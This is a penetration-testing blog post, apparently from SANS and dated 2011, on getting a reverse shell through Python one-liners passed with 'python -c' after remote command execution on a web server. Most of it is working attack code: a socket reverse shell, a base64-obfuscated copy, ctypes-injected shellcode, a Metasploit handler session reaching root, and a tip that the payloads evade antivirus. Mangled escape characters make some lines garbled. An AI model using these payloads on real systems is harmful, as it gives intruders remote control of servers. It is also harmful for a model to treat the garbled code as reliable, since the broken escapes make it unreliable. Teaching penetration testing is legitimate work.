You have remote command execution on a linux web server. Your normal tricks for getting a shell don’t work but you know that the system has a fully functional python interpreter. In order to make your attack work you need to put the entire attack into a single command line passed to a python interpreter with the -c option. Here are a few python based one liners that can be executed with the -c option and tips for creating additional shells. Each of these examples shovel a shell to localhost. Start up a netcat listener to receive the shell ($nc -l -p 9000) before launching these sample attacks.
First we start out with a simple python reverse tcp connect shell like this one.
import socket
import subprocess
s=socket.socket()
s.connect(("127.0.0.1",9000))
while 1:
p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send(p.stdout.read() + p.stderr.read())
>>> import socket;import subprocess ;s=socket.socket() ;s.connect(("127.0.0.1",9000))
>>> while 1: p = subprocess.Popen(s.recv(1024), shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE); s.send(p.stdout.read() + p.stderr.read())markbaggett$ python -c "exec("import socket, subprocess;s = socket.socket();s.connect((‘127.0.0.1’,9000))nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())")"markbaggett$ python
Python 2.5.1 (r251:54863, May 5 2011, 18:37:34)
[GCC 4.0.1 (Apple Inc. build 5465)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> shellcode="import socket, subprocess;s = socket.socket();s.connect((‘127.0.0.1’,9000))nwhile 1: proc = subprocess.Popen(s.recv(1024), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE);s.send(proc.stdout.read()+proc.stderr.read())"
>>> shellcode.encode("base64")
‘aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgonJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJlnY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJlnYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkpn’
markbaggett$ python -c "exec(‘aW1wb3J0IHNvY2tldCwgc3VicHJvY2VzcztzID0gc29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgonJzEyNy4wLjAuMScsOTAwMCkpCndoaWxlIDE6ICBwcm9jID0gc3VicHJvY2Vzcy5Qb3BlbihzLnJlnY3YoMTAyNCksIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUsIHN0ZGVycj1zdWJwncm9jZXNzLlBJUEUsIHN0ZGluPXN1YnByb2Nlc3MuUElQRSk7cy5zZW5kKHByb2Muc3Rkb3V0LnJlnYWQoKStwcm9jLnN0ZGVyci5yZWFkKCkpn’.decode(‘base64’))"
from ctypes import *
reverse_shell = "x68x7fx00x00x01x68xffx02x11x5cx89xe7x31xc0x50x6ax01x6ax02x6ax10xb0x61xcdx80x57x50x50x6ax62x58xcdx80x50x6ax5ax58xcdx80xffx4fxe8x79xf6x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x54x54x53x50xb0x3bxcdx80"
memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell))
shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p))
shellcode()
root# python -c "from ctypes import *;reverse_shell = "x68x7fx00x00x01x68xffx02x11x5cx89xe7x31xc0x50x6ax01x6ax02x6ax10xb0x61xcdx80x57x50x50x6ax62x58xcdx80x50x6ax5ax58xcdx80xffx4fxe8x79xf6x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x54x54x53x50xb0x3bxcdx80";memorywithshell = create_string_buffer(reverse_shell, len(reverse_shell));shellcode = cast(memorywithshell, CFUNCTYPE(c_void_p));shellcode()"
msf > use multi/handler
msf exploit(handler) > set payload osx/x86/shell_reverse_tcp
payload => osx/x86/shell_reverse_tcp
msf exploit(handler) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(handler) > exploit
[*] Started reverse handler on 127.0.0.1:4444
[*] Starting the payload handler…
[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54471) at 2011-10-20 09:19:03 -0400
id
uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),80(admin),20(staff),101(com.apple.sharepoint.group.1)
As an aside, it is worth noting that when you compile this to an exe with pyinstaller you create a python interpreter with an ASCII representation of your script it it. Today no antivirus software detects the ascii source code of Metasploit payloads as malicious. I’m just saying. There you go. Simple, but effective. :)
Tweets – @markbaggett
Join me and Ed Skoudis for SANS 560 Network Penetration Testing and Ethical Hacking vLive ! Starting January 10, 2012 (wow.. 2012 already) CLICK HERE for more information.
